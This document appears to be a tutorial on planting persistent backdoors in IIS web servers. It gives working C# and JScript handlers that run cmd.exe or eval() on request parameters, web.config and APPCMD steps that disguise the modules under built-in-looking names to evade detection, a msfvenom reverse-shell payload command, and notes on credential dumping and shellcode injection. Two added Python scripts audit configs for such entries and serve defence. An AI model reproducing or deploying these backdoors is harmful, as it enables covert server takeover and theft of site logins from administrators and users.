IIS

IIS_Bin_Backdoor

From:https://github.com/WBGlIl/IIS_backdoor
Place IIS_backdoor_dll.dll in the bin folder of the web directory and configure the web.config file:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <modules>
            <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
        </modules>
    </system.webServer>
</configuration>
IIS_backdoor_shell.exe is used to run commands.
Using the name IISBackdoor is too obvious and easily spotted as a backdoor, so the backdoor is renamed here.
Rebuild the solution, put the DLL in the bin directory, and change web.config to:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <modules>
            <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
        </modules>
    </system.webServer>
</configuration>
ๆทปๅŠ ๅฎŒไน‹ๅŽไผš่‡ชๅŠจๅœจๆจกๅ—ไธญๆณจๅ†Œๅฅฝ
image
ๆ‰ง่กŒpayload๏ผŒmsf็”Ÿๆˆrawๆ ผๅผpayload๏ผŒ้€‰ๆ‹ฉshellcode้€‰้กน๏ผŒrawๆ–‡ไปถๆ‹–ๅ…ฅๅณๅฏ
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw
image

IIS_NETDLL_Spy

From:https://github.com/Ivan1ee/NetDLLSpy
ๅŽŸไฝœ่€…ๆๅŠไธ‰็งๆ–นๅผ๏ผŒ็ฌฌไธ€็ง็ผ–่ฏ‘ไปฃ็ ไธบDLLๆ–ฐๅปบaspxๆ–‡ไปถๅฎžไพ‹ๅŒ–ๅŽ้—จ็ฑปๆฅๆ‰ง่กŒๅ‘ฝไปค๏ผŒ็ฌฌไบŒ็งๆ˜ฏๅšhttphandlerๆ˜ ๅฐ„ๅฏๆŒ‡ๅฎšไธ€ไธชๅŽ็ผ€ๆ‰ง่กŒๅ‘ฝไปคไฟๅญ˜ๆ–‡ไปถๅœจwebๆœๅŠกๅ™จไธŠ๏ผŒๅ†่ฏปๅ–็ป“ๆžœใ€‚็ฌฌไธ‰็งๆ˜ฏไฝฟ็”จjsc.exe็ผ–่ฏ‘js่„šๆœฌ็”Ÿๆˆdll๏ผŒๆทปๅŠ ๆ˜ ๅฐ„่œๅˆ€่ฟžๆŽฅใ€‚
่ฟ™้‡Œๆ นๆฎๅŽŸไฝœ่€…็š„ไปฃ็ ๏ผŒ่ฟ›่กŒไบ†ไธ€ไธ‹็ฎ€ๅ•็š„ไฟฎๆ”น๏ผŒไฟฎๆ”นๅŽ็š„ๅŠŸ่ƒฝไธบๆทปๅŠ httphandlerๆ˜ ๅฐ„ๆŒ‡ๅฎšไธ€ไธชๅŽ็ผ€ๆ‰ง่กŒๅ‘ฝไปคๆ˜พ็คบๅœจ้กต้ขไธŠ๏ผŒไธ็”จไฟๅญ˜ๅœจๆœๅŠกๅ™จไธญๅ†่ฎฟ้—ฎใ€‚
ไปฃ็ 
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
	public class Handler : IHttpHandler
	{
		public bool IsReusable
		{
			get
			{
				return false;
			}
		}
		public void ProcessRequest(HttpContext context)
		{
			string input = context.Request.Form["InternetInformationService"];  //command
			if (context.Request.Form["microsoft"] == "iis")//do command
			{
				this.cmdShell(input);
			}
		}
		public void cmdShell(string input)
		{
			Process process = new Process();
			process.StartInfo.FileName = "cmd.exe";
			process.StartInfo.RedirectStandardOutput = true;
			process.StartInfo.UseShellExecute = false;
			process.StartInfo.Arguments = "/c " + input;
			process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
			process.Start();
			StreamReader output = process.StandardOutput;
			String result = output.ReadToEnd();
			output.Close();
			output.Dispose();
			HttpContext.Current.Response.Write(result);
		}
	}
}
ไฟๅญ˜ไธบ้šๆ„ๅŽ็ผ€๏ผŒไฝฟ็”จcsc็ผ–่ฏ‘ใ€‚
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
image
Web.configๆ–‡ไปถๆทปๅŠ 
<system.webServer>
    <handlers>
        <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
    </handlers>
</system.webServer>
Open IIS Manager; the module now appears in Handler Mappings.
Now request any file with the xxx extension:
Request with parameters:
microsoft=iis&InternetInformationService=net user
The third method connects with China Chopper; the code was modified slightly here as well.
import System;
import System.Web;
import System.IO;
package IsapiModule
{
	public class Handler implements IHttpHandler
	{
		function IHttpHandler.ProcessRequest(context : HttpContext)
		{
			context.Response.Write("404 Not Found");
			var I = context;
			var Request = I.Request;
			var Response = I.Response;
			var Server = I.Server;
			eval(context.Request["Internet"]); // pass
		}
		function get IHttpHandler.IsReusable() : Boolean { return true; }
	}
}
ไฝฟ็”จjsc็ผ–่ฏ‘
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
image
็ผ–่พ‘web.config๏ผŒๆทปๅŠ ๆ˜ ๅฐ„๏ผŒ่ฟ™้‡ŒๆŒ‡ๅฎš็š„ๅŽ็ผ€ๆ˜ฏ.iis
<system.webServer>
    <modules runAllManagedModulesForAllRequests="true" />
    <directoryBrowse enabled="true" />
    <staticContent>
        <mimeMap fileExtension=".json" mimeType="application/json" />
    </staticContent>
    <handlers>
        <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode" />
    </handlers>
</system.webServer>
ๅทฒ่‡ชๅŠจๅŠ ๅ…ฅไบ†ๆ˜ ๅฐ„ใ€‚็Žฐๅœจ้šไพฟ่ฎฟ้—ฎไธชiisๅŽ็ผ€็š„ๆ–‡ไปถใ€‚
image
image
ๅฏไฝฟ็”จ่œๅˆ€็›ดๆŽฅ่ฟžๆŽฅ
image
image
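Every technique in the two sections above leaves a trace in the site's web.config: a `<modules>` entry whose name mimics a built-in module but whose type points at an assembly in bin, or a `<handlers>` entry that maps an arbitrary extension (*.xxx, *.iis) to a managed type. The following Python script is an added example for auditing such entries; it is not code from this write-up or from either project. The built-in names and types it knows are an illustrative subset (an assumption, not an inventory of IIS), the first two sample configs are the page's own snippets, and the third is a constructed benign MVC-style entry for comparison.

```python
"""Audit a web.config for managed <modules>/<handlers> entries that look like a
planted module or handler (added example; not code from the write-up or the
projects it cites). The allowlists below are an illustrative subset of what
IIS/ASP.NET ships, not an exhaustive inventory (assumption)."""
import re
import xml.etree.ElementTree as ET

# Built-in entry name -> managed type it is expected to declare.
# None means the built-in entry is native and never carries a managed type= attribute.
BUILTIN_MODULES = {
    "UrlRoutingModule-4.0": "System.Web.Routing.UrlRoutingModule",
    "Session": "System.Web.SessionState.SessionStateModule",
    "FormsAuthentication": "System.Web.Security.FormsAuthenticationModule",
}
BUILTIN_HANDLERS = {
    "PageHandlerFactory-ISAPI-2.0-32": None,
    "PageHandlerFactory-Integrated": "System.Web.UI.PageHandlerFactory",
}
# Extensions an ASP.NET site normally maps to managed handlers.
EXPECTED_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".svc", ".axd", ".cshtml"}
_VERSION_TAIL = re.compile(r"(-\d+(\.\d+)?(_\d+bit)?)+$")
_NOT_BUILTIN = object()


def base_name(name):
    """Strip version/bitness suffixes so 'UrlRoutingModule-4.0' and
    'PageHandlerFactory-ISAPI-2.0-32-1' compare against their built-in base."""
    return _VERSION_TAIL.sub("", name)


def audit_web_config(xml_text):
    """Return (severity, section, name, reason) findings, most serious first."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for section, builtins in (("modules", BUILTIN_MODULES), ("handlers", BUILTIN_HANDLERS)):
        known = {base_name(n): t for n, t in builtins.items()}
        for container in root.iter(section):
            for entry in container.findall("add"):
                name, mtype = entry.get("name", ""), entry.get("type")
                path = entry.get("path", "")
                expected = known.get(base_name(name), _NOT_BUILTIN)
                if expected is _NOT_BUILTIN:
                    # Custom types are normal for real apps: surface them for review only.
                    if mtype and not mtype.startswith(("System.", "Microsoft.")):
                        findings.append(("info", section, name,
                                         f"custom managed type {mtype}; confirm the assembly in bin"))
                elif expected is None:
                    # A native built-in name that suddenly carries a managed type.
                    if mtype:
                        findings.append(("high", section, name,
                                         f"built-in native entry name now declares managed type {mtype}"))
                elif mtype != expected:
                    findings.append(("high", section, name,
                                     f"built-in name but type is {mtype}, expected {expected}"))
                ext = path.lower()[1:] if path.startswith("*.") else ""
                if section == "handlers" and mtype and ext and ext not in EXPECTED_EXTENSIONS:
                    findings.append(("medium", section, name,
                                     f"managed handler mapped to unusual extension {path}"))
    order = {"high": 0, "medium": 1, "info": 2}
    return sorted(findings, key=lambda f: order[f[0]])


# Sample inputs: the renamed-module and *.iis handler snippets from the write-up above.
RENAMED_MODULE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><modules>
  <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
</modules></system.webServer></configuration>"""
IIS_EXTENSION_CONFIG = """<system.webServer><handlers>
  <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*"
       type="IsapiModule.Handler" preCondition="integratedMode"/>
</handlers></system.webServer>"""
# Constructed benign entry as found in a typical MVC app (assumption).
BENIGN_CONFIG = """<configuration><system.webServer><modules>
  <add name="UrlRoutingModule-4.0" type="System.Web.Routing.UrlRoutingModule"
       preCondition="managedHandler" />
</modules></system.webServer></configuration>"""

if __name__ == "__main__":
    samples = [("renamed module", RENAMED_MODULE_CONFIG),
               ("*.iis handler", IIS_EXTENSION_CONFIG),
               ("benign", BENIGN_CONFIG)]
    for label, cfg in samples:
        for severity, section, name, reason in audit_web_config(cfg):
            print(f"[{severity}] {label}: <{section}> {name}: {reason}")
```

The name-collision check is the one that matters for the renaming trick shown above: a module called UrlRoutingModule is only unremarkable if its type is the framework's own, so the script compares the declared type against the expected one rather than trusting the name. Custom types in bin are reported at info level because real applications register their own modules too; the list is meant to be diffed against a known-good copy of the site's web.config.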

IIS_RAID

From:https://github.com/0x09AL/IIS-Raid
ๅœจvs2019ไธ‹็ผ–่ฏ‘
ๅœจFunctions.hไธญไฟฎๆ”น่ฟžๆŽฅๅฏ†็ ๏ผŒpassfileๆ˜ฏdumpไธ‹ๆฅ็š„ๅฏ†็ ไฟๅญ˜็š„ไฝ็ฝฎ๏ผŒcom_headerๆ˜ฏๅŽ้—จๅ’ŒๆœๅŠกๅ™จ้€šไฟก็š„่ฏทๆฑ‚ๅคดใ€‚
image
ๆ‰“ๅผ€้กน็›ฎไฟฎๆ”นๅฎŒไฝ ็š„ๅฏ†็ ๏ผŒ็›ดๆŽฅctrl+B็”Ÿๆˆ่งฃๅ†ณๆ–นๆกˆๅณๅฏ(่ฟ™้‡Œ็”Ÿๆˆ็š„ๆ˜ฏrelease็‰ˆๆœฌ)
Dllไผ ๅˆฐๆœๅŠกๅ™จ๏ผŒๆ”นไธชๅๅญ—๏ผŒๆ‰ง่กŒๆทปๅŠ ๆจกๅ—
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
It can now be seen in the Modules list.
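Installing a native module with APPCMD as above records it under `<globalModules>` in applicationHost.config, so that section is where a defender looks for modules IIS did not ship with. The following Python is an added example (not code from IIS-Raid) that audits that section: INETSRV is the assumed default install path, KNOWN_NATIVE is a small illustrative subset of the real module inventory (an assumption), and the sample applicationHost.config fragment is constructed after the APPCMD command above.

```python
"""Audit the <globalModules> section of an IIS applicationHost.config for native
modules that IIS did not ship with (added example; not code from IIS-Raid).
Assumptions: INETSRV is the default IIS install path, and KNOWN_NATIVE is an
illustrative subset of the real module inventory, not a complete list."""
import difflib
import ntpath
import re
import xml.etree.ElementTree as ET

INETSRV = r"c:\windows\system32\inetsrv"
KNOWN_NATIVE = {  # built-in module name -> image file name (subset)
    "StaticFileModule": "static.dll",
    "DefaultDocumentModule": "defdoc.dll",
    "DirectoryListingModule": "dirlist.dll",
    "IsapiModule": "isapi.dll",
    "IsapiFilterModule": "filter.dll",
    "HttpLoggingModule": "loghttp.dll",
    "RequestFilteringModule": "modrqflt.dll",
    "AnonymousAuthenticationModule": "authanon.dll",
    "CustomErrorModule": "custerr.dll",
}


def normalize_image(image):
    """Expand %windir%/%SystemRoot% and unify slashes and case so paths compare."""
    expanded = re.sub(r"%(windir|systemroot)%", lambda m: r"c:\windows", image, flags=re.I)
    return ntpath.normcase(expanded)


def audit_global_modules(xml_text):
    """Return (severity, name, reason) findings for every globalModules entry."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for section in root.iter("globalModules"):
        for entry in section.findall("add"):
            name = entry.get("name", "")
            image = normalize_image(entry.get("image", ""))
            directory, filename = ntpath.split(image)
            if directory != INETSRV:
                findings.append(("high", name, f"image loaded from outside inetsrv: {image}"))
            if name in KNOWN_NATIVE:
                # Built-in name: the only question is whether the image was swapped.
                if filename != KNOWN_NATIVE[name]:
                    findings.append(("high", name,
                                     f"built-in name but image is {filename}, expected {KNOWN_NATIVE[name]}"))
                continue
            reason = f"not a known IIS native module (image {filename})"
            # A name chosen to blend in (IsapiDotNet next to IsapiModule) is worth calling out.
            close = difflib.get_close_matches(name, KNOWN_NATIVE, n=1, cutoff=0.6)
            if close:
                reason += f"; name resembles built-in {close[0]}"
            findings.append(("medium", name, reason))
    return findings


# Constructed applicationHost.config fragment modelled on the APPCMD command above.
SAMPLE_APPHOST = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="IsapiModule" image="%windir%\System32\inetsrv\isapi.dll" />
      <add name="IsapiDotNet" image="c:\windows\system32\inetsrv\IsapiDotNet.dll" />
    </globalModules>
  </system.webServer>
</configuration>"""

if __name__ == "__main__":
    for severity, name, reason in audit_global_modules(SAMPLE_APPHOST):
        print(f"[{severity}] {name}: {reason}")
```

Because the renamed DLL in the write-up is copied into inetsrv itself, a path check alone would miss it; the allowlist comparison and the near-name match are what flag the entry. In practice the image file's hash and signature should be checked as well, since a native module runs inside w3wp.exe for every request.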
่ฟœ็จ‹่ฟžๆŽฅ
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
ๆ‰ง่กŒๅ‘ฝไปค็š„ๆ–นๅผๆ˜ฏ
>cmd +ๅ‘ฝไปค
image
Dumpๅ‘ฝไปคๅฏไปฅdumpไธ‹ๆฅIIS็ซ™็‚น็š„็™ปๅฝ•็š„ไฟกๆฏ๏ผŒไฟๅญ˜ๅœจ่ฎพ็ฝฎ็š„ไฝ็ฝฎใ€‚
Injectๅฏไปฅๆ‰ง่กŒshellcode
Cs/msf็”Ÿๆˆrawๆ ผๅผ็š„shellcode
>inject ไฝ็ฝฎ
image

ๆœ€ๅŽๆ›ดๆ–ฐไบŽ

่ฟ™ๆœ‰ๅธฎๅŠฉๅ—๏ผŸ